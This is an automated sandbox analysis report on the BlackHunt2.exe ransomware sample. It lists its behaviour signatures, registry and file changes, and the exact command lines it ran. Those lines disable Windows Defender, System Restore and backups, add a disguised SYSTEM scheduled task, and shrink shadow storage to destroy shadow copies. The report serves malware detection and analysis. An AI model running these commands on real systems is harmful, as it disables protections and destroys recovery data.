Analysis Overview
SHA256
ba011447038aab7f6b94cad29c2ac6405c1b8098dc65a94fb095af48422a56c9
Threat Level: Known bad
The file BlackHunt2.exe was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Deletes NTFS Change Journal
UAC bypass
Renames multiple (3360) files with added filename extension
Renames multiple (2894) files with added filename extension
Modifies boot configuration data using bcdedit
Clears Windows event logs
Deletes shadow copies
Disables use of System Restore points
Deletes backup catalog
Disables Task Manager via registry modification
Checks computer location settings
Deletes itself
Adds Run key to start application
Looks up external IP address via web service
Enumerates connected drives
Checks whether UAC is enabled
Sets desktop wallpaper using registry
Drops file in Program Files directory
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
Program crash
Enumerates physical storage devices
Unsigned PE
Runs ping.exe
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Kills process with taskkill
Checks SCSI registry key(s)
Interacts with shadow copies
Uses Task Scheduler COM API
Scheduled Task/Job: Scheduled Task
Suspicious behavior: CmdExeWriteProcessMemorySpam
System policy modification
Modifies registry class
Uses Volume Shadow Copy service COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-06 00:48
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-06 00:48
Reported
2024-11-06 00:50
Platform
win7-20240903-en
Max time kernel
121s
Max time network
121s
Command Line
Signatures
Deletes NTFS Change Journal
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\fsutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\fsutil.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Clears Windows event logs
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| N/A | N/A | C:\Windows\system32\wevtutil.exe | N/A |
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Renames multiple (2894) files with added filename extension
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Disables Task Manager via registry modification
Disables use of System Restore points
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" | C:\Windows\system32\reg.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Enumerates connected drives
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\images\cursors\invalid32x32.gif | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Atlantic\Bermuda | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ku_IQ\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\zi\Indian\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Dili | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Dublin | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\WhiteDot.png | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Windhoek | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Pangnirtung | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Yakutsk | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\ext\jaccess.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\zi\Indian\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Goose_Bay | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToNotesBackground.wmv | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookicon.gif | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-output2.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Istanbul | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Winamac | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Caracas | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Araguaina | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port-au-Prince | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_HK.properties | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\content-types.properties | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\bn\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\hy\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santo_Domingo | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9 | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\Java\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Port_Moresby | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zCon.sfx | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Auckland | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pitcairn | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_zh_CN.jar | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe
"C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
